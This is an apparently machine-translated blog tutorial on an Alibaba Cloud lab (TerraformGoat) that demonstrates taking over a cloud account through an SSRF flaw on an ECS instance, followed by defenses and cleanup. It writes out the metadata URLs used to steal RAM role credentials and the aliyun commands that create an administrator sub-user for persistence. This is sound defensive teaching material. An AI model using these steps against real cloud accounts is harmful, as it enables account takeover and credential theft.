当前位置：网站首页>From the ECS SSRF vulnerability to taking over your alicloud console

From the ECS SSRF vulnerability to taking over your alicloud console

2022-06-09 02:14:00 【InfoQ】

0x00 Preface

This article will take Alibaba cloud as an example , Demonstrate some offensive and defensive tactics in cloud services , The first use of Terraform Conduct ECS SSRF Establishment of vulnerability environment , Then through the existing in the instance SSRF The vulnerability takes all Alibaba cloud service permissions of the cloud service account step by step .

0x01 Environment building

In this paper TerraformGoat Build the shooting range ,Terraform Range address ：

https://github.com/HuoCorp/TerraformGoat

When deploying the range , You need your alicloud AccessKey, To avoid affecting your cloud production environment , Therefore, it is strongly recommended to use non production environment AccessKey, Do not use the same account number as the production environment .

Next, start to build the shooting range , First clone the range project to the local , And build the dependencies needed to download the range .

git clone https://github.com/HuoCorp/TerraformGoat.git --depth 1
cd TerraformGoat
docker build . -t terraformgoat:v0.0.3
docker run -itd --name terraformgoat terraformgoat:v0.0.3
docker exec -it terraformgoat /bin/bash

If github Slow access , You can attach an agent to the terminal

proxy_url=&quot;127.0.0.1:1080&quot; && export https_proxy=http://$proxy_url http_proxy=http://$proxy_url all_proxy=socks5://$proxy_url

After entering the container , The container will prompt you to select the cloud service provider to use next , Take Alibaba cloud services as an example , Input 2 Select alicloud and press enter .

Enter alicloud ECS SSRF Under the range path , And configure your AccessKey

cd /TerraformGoat/aliyun/ecs/ecs_ssrf/
aliyun configure

Deploy SSRF shooting range

terraform init
terraform apply

If init Initialization is slow , Just hang up the agent

stay apply period , Will prompt Enter a value, Enter yes You can enter. .

stay Outputs It's about , You can see the returned range address , Visit this address , You can see SSRF Test range page , This means that the environment has been set up .

0x02 Environmental utilization

The current environment exists SSRF Loophole , However, it is not normal SSRF The environment is different , there SSRF The vulnerability appears on the ECS , This means that we can use this SSRF The vulnerability obtains the metadata information of the server .

Access metadata

http://100.100.100.200/latest/meta-data

In the returned results , You can see that the current environment exists ram/ Catalog , This means that the current ECS configuration RAM role , In this way, we can get the temporary certificate .

Obtain temporary vouchers through metadata

here URL Medium huocorp-terraform-goat-role yes RAM Character name , Can be accessed by http://100.100.100.200/latest/meta-data/ram/security-credentials/ Get .

http://100.100.100.200/latest/meta-data/ram/security-credentials/huocorp-terraform-goat-role

Configure temporary vouchers to aliyun Command line tools .

aliyun configure --mode StsToken

Create a child user , And give the administrator permission

aliyun ram CreateUser --UserName teamssix
aliyun ram CreateLoginProfile --UserName teamssix --Password [email protected]
aliyun ram AttachPolicyToUser --PolicyType System --PolicyName AdministratorAccess --UserName teamssix

visit

https://signin.aliyun.com

page , adopt RAM Users log in , The user format here is [email protected], among username Is the user name just created ,company-alias You can get... Through the following command .

aliyun ram GetAccountAlias

there AccountAlias That's what we need company-alias, Then you can log in to the console .

Enter the password you just created

After logging in , You can see the target console .

Because just now when creating a user , Given AdministratorAccess jurisdiction , So in RAM The access control office can see , The current account has permission to manage all Alibaba cloud resources .

In cloud services ECS We can also see the one we just built in the example SSRF Range server .

thus , This enables the use of the SSRF The vulnerability has taken over the Alibaba cloud console .

In addition, there is also a flag file , If you're interested , You can try to find this flag,Writeup Address ：
https://github.com/HuoCorp/TerraformGoat/tree/main/aliyun/ecs/ecs_ssrf

0x03 Defensive measures

The problem of this environment exists except SSRF Outside , There are two other main problems ：

RAM Role permission is too large , As a result, you can create child users and grant high permissions to child users through the permissions of this role

Metadata is not securely accessed , Cause once the target exists SSRF Loophole , Metadata is at risk of being acquired

So for the first RAM The role permission is too large , Users should strictly abide by the principle of minimizing permissions , For RAM When a role is given permission , Avoid giving too much authority , Just give yourself the permissions you need , This will minimize the impact , But this is not a cure .

The second problem is that metadata is not reinforced , You can set the metadata access mode on the instance to the hardening mode , This is a permanent cure , There are two ways to set metadata access mode to hardening mode ：

When creating an instance , Can be in 「 The system configuration 」 Of 「 Advanced options 」 Lieutenant general 「 Instance metadata access mode 」 Set to 「 Reinforcement mode only 」

In the already created instance , You can go to alicloud OpenAPI Metadata is enabled in the Token visit ,OpenAPI Address ：
https://next.api.aliyun.com/api/Ecs/2014-05-26/ModifyInstanceMetadataOptions

take HttpTokens Set to required This means that the reinforcement mode is mandatory , When you access the metadata again, you will be prompted 403 了 .

It is worth mentioning that , Setting metadata to hardening mode can prevent from passing through SSRF Get metadata , But if the instance permission is taken , Then the red team can still get the data by executing on the instance token The order of , Then use the token Get metadata .

stay Linux Get in instance token The command is as follows ：

TOKEN=`curl -X PUT &quot;http://100.100.100.200/latest/api/token&quot; -H &quot;X-aliyun-ecs-metadata-token-ttl-seconds: 21600&quot;`

adopt token Fetch metadata

curl -H &quot;X-aliyun-ecs-metadata-token: $TOKEN&quot; http://100.100.100.200/latest/meta-data/

about Windows Please refer to the official Alibaba cloud documentation for the method of obtaining the instance ：

https://help.aliyun.com/document_detail/108460.htm

Set metadata access mode to reinforcement mode for defense SSRF This method of vulnerability is provided by 2h0ng The master provides

0x04 Environment delete

Delete the created sub account

aliyun ram DetachPolicyFromUser --PolicyType System --PolicyName AdministratorAccess --UserName teamssix
aliyun ram DeleteUser --UserName teamssix

Delete SSRF Range environment , After using the range , Remember to delete in time , Because the cloud service created here is billed by time , The price of this range instance is... Per hour 0.17 RMB .

Before destroying the range , Remember to AccessKey Configure to start with AccessKey, Configuration command ：aliyun configure --mode AK

terraform destroy

If you want to clear TerraformGoat, You can use the following command , If you want to learn cloud attack and defense in the future , Then you can put TerraformGoat The environment is preserved .

docker stop terraformgoat
docker rm terraformgoat
docker rmi terraformgoat:v0.0.3

0x05 summary

Here through the cloud SSRF The vulnerability obtained the temporary key , A child user with administrator access is created through the temporary secret key , Finally, the target console is taken over by this sub user .

But there are some prerequisites for using this method in practice , There are two main premises ：

ECS Instances need to be granted RAM role , Otherwise, accessing the metadata of the temporary voucher will return 404

RAM The role needs to have ram Access control related operation permissions , For example, creating users 、 Give permission, etc , Otherwise, the temporary secret key will not have the permission to create child users .

In actual combat , If ECS Instance is granted RAM The character's situation , Most of the time, this role does not have the permission to create users , At this time, you can't log in to the console by creating a sub account , The target cloud service can only be operated through the Alibaba cloud command line tool .

in general , The cloud attack and defense are very different from the conventional intranet attack and defense .

The common problem of cloud attack and defense is the configuration error , For example, the problem here is RAM The role configuration permission is too high .

The main method to maintain the permissions of attack and defense on the cloud is to create RAM High authority users , Instead of having a variety of ways to maintain permissions as in the traditional attack and defense .

The intranet horizontal of cloud attack and defense is mainly conducted in the command line or console of the cloud service provider , From this cloud service to another cloud service , Instead of the traditional attack and defense, there are all kinds of internal net horizontal techniques .

……

Last , Many of the commands mentioned in this article refer to the content in the FireWire cloud security knowledge base , Knowledge base address ：

https://cloudsec.huoxian.cn

, You can see the fire line cloud service attack and defense matrix on the homepage of the knowledge base , This article is based on this attack and defense matrix for cloud attack and defense .

If you want to find more cloud security resources to learn , You can visit Awesome Cloud Security project , The project has collected more than 100 cloud security blogs at home and abroad 、 Tools 、 Official account and other resources , Project address ：

https://github.com/teamssix/awesome-cloud-security